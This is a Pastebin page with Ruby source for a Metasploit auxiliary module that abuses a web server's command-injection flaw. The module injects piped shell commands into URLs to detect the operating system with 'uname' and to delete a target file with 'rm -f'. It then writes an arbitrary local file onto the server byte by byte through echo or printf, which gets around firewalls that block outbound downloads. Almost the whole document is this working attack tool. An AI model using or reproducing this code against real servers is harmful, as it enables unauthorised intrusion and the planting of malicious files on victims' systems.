Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##
- # $Id: perlpipe_rce_to_file_osdetect.rb 13018 2011-06-24 14:43:59Z oxagast $
- ##
- ##
- # This file is part of the Metasploit Framework and may be subject to
- # redistribution and commercial restrictions. Please see the Metasploit
- # Framework web site for more information on licensing and terms of use.
- # http://metasploit.com/framework/
- ##
- require 'msf/core'
- require 'net/http'
- require 'uri'
- require 'digest/md5'
- class Metasploit3 < Msf::Auxiliary
- include Msf::Auxiliary::Report
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Uses RCE on a webserver to upload files',
- 'Description' => %q{
- This module pushes data into a file with webserver RCE bugs that block downloading
- from external sources due to firewall rules.
- },
- 'Author' => [ 'Marshall Whittaker <oxagast [at] gmail.com>' ],
- 'License' => MSF_LICENSE,
- 'Version' => '$Revision: 13581 $'
- ))
- register_options(
- [
- OptString.new('DOMAIN', [ true, "The domain"]),
- OptString.new('REMOTEFILE', [ true, "Where to output the file on the remote server"]),
- OptString.new('LOCALFILE', [ true, "Location of the file you wish to send"]),
- OptString.new('FIRSTPART', [ true, "First part of the url"]),
- OptString.new('LASTPART', [ false, "Last part of the url"]),
- ], self.class)
- register_advanced_options(
- [
- OptString.new('PROXY', [ false, "Proxy server to route connection. <host>:<port>",nil]),
- OptString.new('PROXY_USER', [ false, "Proxy Server User",nil]),
- OptString.new('PROXY_PASS', [ false, "Proxy Server Password",nil])
- ], self.class)
- end
- def run
- if datastore['PROXY']
- @proxysrv,@proxyport = datastore['PROXY'].split(":")
- @proxyuser = datastore['PROXY_USER']
- @proxypass = datastore['PROXY_PASS']
- else
- @proxysrv,@proxyport = nil, nil
- end
- chunksize = 1
- part2 = ""
- hexxydots = (chunksize * 5)
- thisurl = datastore['DOMAIN']
- localfilepath = datastore['LOCALFILE']
- remotefilepath = datastore['REMOTEFILE']
- part1 = datastore['FIRSTPART']
- part2 = datastore['LASTPART']
- thefile = open(localfilepath, "rb") {|io| io.read}
- md5checksum = Digest::MD5.hexdigest(thefile)
- url = URI.parse(thisurl)
- oschecker = Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode("#{part1}|uname|#{part2}"))}
- if oschecker.body =~ /Linux/
- oscheck = 0
- end
- if oschecker.body =~ /BSD/
- oscheck = 1
- end
- if oschecker.body =~ /Solaris/
- oscheck = 2
- end
- if oschecker.body =~ /SunOS/
- oscheck = 2
- end
- if oscheck == 0
- print_status "Detected OS : Linux"
- hexer = (thefile.unpack('H2'*thefile.length).collect {|val| "\\\\x" + val}).join
- hexxy = hexer.scan(/.{#{hexxydots}}/)
- inchunks = hexxy.each_slice(chunksize).to_a
- url1 = URI.parse(thisurl)
- print_status "Trying to remove remote file"
- Net::HTTP.start(url1.host, url1.port) {|http| http.get(URI.encode("#{part1}|rm -f #{remotefilepath}|#{part2}"))}
- print_status "Sending file #{localfilepath}"
- for i in 0..inchunks.length - 1
- toecho = "#{part1}|echo -n -e \"#{inchunks[i].join}\" >> #{remotefilepath}|#{part2}"
- url = URI.parse(thisurl)
- Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode(toecho))}
- end
- checkedsum = Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode("#{part1}|md5sum #{remotefilepath}|#{part2}"))}
- if checkedsum.body =~ /#{Regexp.escape(md5checksum)}/
- print_status "MD5 checksum matches"
- end
- end
- if oscheck == 1
- print_status "Detected OS : BSD"
- hexer = (thefile.unpack('H2'*thefile.length)).collect {|hexstuff| "0x" + hexstuff.to_s}
- octal=[]
- for hexroll in 0..hexer.length - 1
- octalstr = "\\0%o" % hexer[hexroll]
- octal.push(octalstr)
- end
- url1 = URI.parse(thisurl)
- print_status "Trying to remove remote file"
- Net::HTTP.start(url1.host, url1.port) {|http| http.get(URI.encode("#{part1}|rm -f #{remotefilepath}|#{part2}"))}
- print_status "Sending file #{localfilepath}"
- for i in 0..octal.length - 1
- toecho = "#{part1}|printf \"#{octal[i]}\" >> #{remotefilepath}|#{part2}"
- url = URI.parse(thisurl)
- Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode(toecho))}
- end
- end
- if oscheck == 2
- print_status "Detected OS : SunOS/Solaris"
- hexer = (thefile.unpack('H2'*thefile.length)).collect {|hexstuff| "0x" + hexstuff.to_s}
- octal=[]
- for hexroll in 0..hexer.length - 1
- octalstr = "\\%04o" % hexer[hexroll]
- octal.push(octalstr)
- end
- url1 = URI.parse(thisurl)
- print_status "Trying to remove remote file"
- Net::HTTP.start(url1.host, url1.port) {|http| http.get(URI.encode("#{part1}|rm -f #{remotefilepath}|#{part2}"))}
- print_status "Sending file #{localfilepath}"
- for i in 0..octal.length - 1
- toecho = "#{part1}|echo \"#{octal[i]}\\c\" >> #{remotefilepath}|#{part2}"
- url = URI.parse(thisurl)
- Net::HTTP.start(url.host, url.port) {|http| http.get(URI.encode(toecho))}
- end
- end
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement